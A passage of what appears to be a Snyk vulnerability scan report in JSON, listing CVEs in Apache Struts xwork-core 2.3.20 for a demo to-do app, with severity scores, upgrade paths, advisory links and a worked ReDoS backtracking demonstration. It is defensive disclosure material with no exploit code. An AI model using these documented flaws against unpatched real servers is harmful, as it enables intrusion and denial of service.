When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162)", + "epssDetails": { + "percentile": "0.96202", + "probability": "0.18207", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-2162" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.701000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T07:51:26.242000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-03-16T07:51:26.242000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:47.186038Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "org.apache.struts.xwork:xwork-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + 
"title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.24.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:35.405967Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)", + "epssDetails": { + "percentile": "0.90602", + "probability": "0.02732", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3093" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": 
"org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.713000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T02:16:48.918000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-02T02:16:48.918000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:50.033229Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.3", + "org.apache.struts.xwork:xwork-core@2.3.24.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "title": "Access Restriction Bypass", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.28.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": 
"NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.417349Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", + "epssDetails": { + "percentile": "0.77304", + "probability": "0.00531", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4433" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.724000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T01:33:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-21T01:33:07Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:52.478661Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Alvaro Munoz" + ], + "semver": { + "vulnerable": [ + "[2.2.1,2.3.28.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-036.html", + "title": "Apache Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:55.264787Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:49.390018Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": 
"2024-03-11T09:46:55.264787Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Remote code Execution. The Apache Struts frameworks when forced, performs double evaluation of attributes' values assigned to certain tags so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered.\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-036.html)\n", + "epssDetails": { + "percentile": "0.94726", + "probability": "0.09408", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4461" + ], + "CWE": [ + "CWE-264" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.738000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-11-14T07:48:03.440000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-11-14T07:48:03.440000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.264787Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + 
"title": "Regular Expression Denial of Service (ReDoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.316157Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). 
The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. 
But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. 
These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95900", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4465" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.751000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:45:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-20T07:45:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.243501Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + 
"id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "title": "Command Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.20.2)", + "[2.3.24, 2.3.24.2)", + "[2.3.28, 2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.554699Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "description": "## 
Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", + "epssDetails": { + "percentile": "0.99987", + "probability": "0.97524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3081" + ], + "CWE": [ + "CWE-77" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2019-07-16T11:38:49.236917Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T04:32:51Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-04-22T04:32:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:20.892839Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3", + "org.apache.struts.xwork:xwork-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418", + "title": "Insecure Defaults", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "Jasper Rosenberg" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.20.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.20.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/WW-4486", + "title": "Jira Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831", + "title": "NVD" + }, + { + "url": "https://struts.apache.org/docs/s2-024.html", + "title": "Struts Security Advisory" + }, + { + "url": "http://struts.apache.org/docs/s2-024.html", + "title": "Vulnerability Summary" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:26.053752Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + 
"baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.093877Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:26.053752Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Insecure Defaults. The default exclude patterns (excludeParams) allow remote attackers to \"compromise internal state of an application\" via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8)\n- [GitHub Commit](https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b)\n- [Jira Issue](https://issues.apache.org/jira/browse/WW-4486)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831)\n- [Struts Security Advisory](https://struts.apache.org/docs/s2-024.html)\n- [Vulnerability Summary](http://struts.apache.org/docs/s2-024.html)\n", + "epssDetails": { + "percentile": "0.85294", + "probability": "0.01190", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-1831" + ], + "CWE": [ + "CWE-453" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2019-10-27T13:46:24.359760Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-05-11T16:51:55Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + 
"packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2015-05-11T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:26.053752Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.1", + "org.apache.struts.xwork:xwork-core@2.3.20.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Huawei PSIRT" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf", + "title": "GitHub Commit" + }, + { + "url": "https://struts.apache.org/docs/s2-027.html", + "title": "Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:51.429176Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + 